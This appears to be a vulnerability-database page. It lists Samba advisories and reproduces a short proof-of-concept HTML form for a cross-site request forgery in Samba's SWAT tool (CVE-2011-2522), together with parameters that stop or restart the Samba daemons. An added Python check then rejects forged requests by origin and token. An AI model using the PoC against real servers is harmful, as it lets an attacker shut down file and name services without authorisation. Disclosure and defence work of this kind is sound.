| Title | Published | Views | Reporter |
|---|---|---|---|
| SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC | 27 Jul 2011 00:00 | – | zdt |
| Samba -- cross site scripting and request forgery vulnerabilities | 27 Jul 2011 00:00 | – | freebsd |
| Security fix for the ALT Linux 6 package samba version 3.5.10-alt1 | 28 Jul 2011 00:00 | – | altlinux |
| Samba 3.x < 3.3.16 / 3.4.14 / 3.5.10 Multiple Vulnerabilities | 9 Jun 2016 00:00 | – | nessus |
| CentOS 4 / 5 : samba (CESA-2011:1219) | 30 Aug 2011 00:00 | – | nessus |
| CentOS 5 : samba3x (CESA-2011:1220) | 23 Sep 2011 00:00 | – | nessus |
| Debian DSA-2290-1 : samba - XSS | 8 Aug 2011 00:00 | – | nessus |
| Fedora 15 : samba-3.5.11-71.fc15.1 (2011-10341) | 17 Aug 2011 00:00 | – | nessus |
| Fedora 14 : samba-3.5.11-79.fc14 (2011-10367) | 17 Aug 2011 00:00 | – | nessus |
| FreeBSD : Samba -- XSS and request forgery vulnerabilities (56f4b3a6-c82c-11e0-a498-00215c6a37bb) | 17 Aug 2011 00:00 | – | nessus |
<!--
# Secur-I Research Group - Proof-of-Concept
# ==========================================================================
# Title: Cross-Site Request Forgery in SWAT (Samba Web Administration Tool)
# Vulnerable versions: Samba 3.0.x - 3.5.9 (inclusive)
# Fixed version: Samba 3.5.10
# Product Homepage: http://www.samba.org/
# CVE-ID: CVE-2011-2522
# References: http://www.samba.org/samba/security/CVE-2011-2522
# ==========================================================================
-->
<html>
<body>
<form method="post" action="http://VULN_SERVER:901/status">
<input type="submit" onclick="window.open('http://securview.com')" name="VUL_PARM" value="w00t!">
</form>
</body>
</html>
<!--
VUL_PARM could be one of the following:
smbd_start, smbd_stop, smbd_restart : to start/stop/restart the smbd (Samba) daemon
nmbd_start, nmbd_stop, nmbd_restart : to start/stop/restart the nmbd (NetBIOS) daemon
winbindd_start, winbindd_stop, winbindd_restart : to start/stop/restart the winbindd (Windows Name Service Switch) daemon
-->
Thanks & Regards,
Narendra.
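The PoC works because the `/status` handler acts on the daemon-control parameters without checking where the request came from. The following server-side check rejects such a forged POST; it is an added example, not part of the original advisory and not Samba's own fix. It assumes a hypothetical handler that receives the request headers and form fields, a hidden field named `csrf_token`, and constructed host names.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Daemon-control parameters listed in the PoC comment above.
DAEMON_ACTIONS = {f"{d}_{a}" for d in ("smbd", "nmbd", "winbindd")
                  for a in ("start", "stop", "restart")}

def new_csrf_token() -> str:
    """Per-session random token, embedded as a hidden field in the admin form."""
    return secrets.token_urlsafe(32)

def same_origin(headers: dict, expected_origin: str) -> bool:
    """True only if Origin (or, failing that, Referer) matches the admin UI."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    u = urlsplit(source)
    return f"{u.scheme}://{u.netloc}".lower() == expected_origin.lower()

def check_status_post(headers, form, session_token, expected_origin):
    """Return (allowed, reason) for a POST to /status."""
    requested = DAEMON_ACTIONS & form.keys()
    if not requested:
        return True, "no daemon action requested"
    if not same_origin(headers, expected_origin):
        return False, "cross-origin request"
    supplied = form.get("csrf_token", "")  # hypothetical field name
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or invalid token"
    return True, "ok: " + ",".join(sorted(requested))

# Constructed sample requests; all host names are placeholders.
ORIGIN = "http://swat.example.internal:901"
TOKEN = new_csrf_token()
forged = ({"Origin": "http://other-site.example"}, {"smbd_stop": "w00t!"})
no_token = ({"Origin": ORIGIN}, {"smbd_stop": "Stop smbd"})
legit = ({"Referer": ORIGIN + "/status"},
         {"nmbd_restart": "Restart nmbd", "csrf_token": TOKEN})

if __name__ == "__main__":
    for name, (h, f) in (("forged", forged), ("no-token", no_token), ("legit", legit)):
        print(name, check_status_post(h, f, TOKEN, ORIGIN))
```

The origin check and the token are independent defenses: the token still rejects a request whose Origin header matches but which did not come from a form the server issued.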